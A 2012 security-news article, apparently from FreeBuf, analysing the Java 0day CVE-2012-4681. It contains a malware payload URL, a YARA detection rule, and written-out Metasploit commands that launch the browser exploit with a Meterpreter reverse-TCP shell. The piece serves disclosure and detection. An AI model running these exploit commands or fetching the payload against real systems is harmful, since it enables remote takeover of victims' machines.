freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

最新Java 0day漏洞分析及EXP下载(CVE-2012-4681)
2012-08-27 21:58:29

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

FireEeye在8月27日发布了一个新的java 0day的一些相关信息,该漏洞影响浏览器的JRE[1.7.x]插件,影响非常大,攻击者可利用该漏洞进行挂马攻击。在捕获的样本中发现使用了Dadong's JSXX 0.44 VIP加密方式。
1
该java程序中包含了以下两个类文件:(Gondzz.class下载  Gondvv.class下载
- cve2012xxxx/Gondzz.class
- cve2012xxxx/Gondvv.class
该程序会检查系统运行的版本,如果系统存在漏洞,payload就会被下载。注意观察代码中“我有一只小毛驴,从来也不骑”,如下图:

2

分析样本是从ok.aa24.net / meeting / hi.exe下载恶意文件,检测结果如下:
https://www.virustotal.com/file/09d10ae0f763e91982e1c276aad0b26a575840ad986b8f53553a4ea0a948200f/analysis/1346055031/

你可以通过以下规则检测恶意类文件:
rule Java0daycve2012xxxx_generic
{
  meta:
     weight=100
     author = “Jaime Blasco”
     source = “alienvault”
     date = “2012-08″
  strings:
        $ =  ”java/security/ProtectionDomain”
        $ = “java/security/Permissions”
        $ = “java/security/cert/Certificate”
        $ = “setSecurityManager”
        $ = “file:///”
        $ = “sun.awt.SunToolkit”
        $ = “getField”
  condition:
    all of them
}

Metasploit 已经发布了该漏洞利用的模块,需要测试的同学可以迅速更新下载,如下图:

3

使用方法:


use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Youtube观看演示过程(翻墙)EXP下载

此漏洞影响JRE[1.7.x]插件,不影响java 6及以下
影响浏览器:iE、Firefox、opera、chrome
目前尚未补丁!


本文作者:, 转载请注明来自FreeBuf.COM

# java 0day # java漏洞 # java网马 # CVE-2012-4681
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑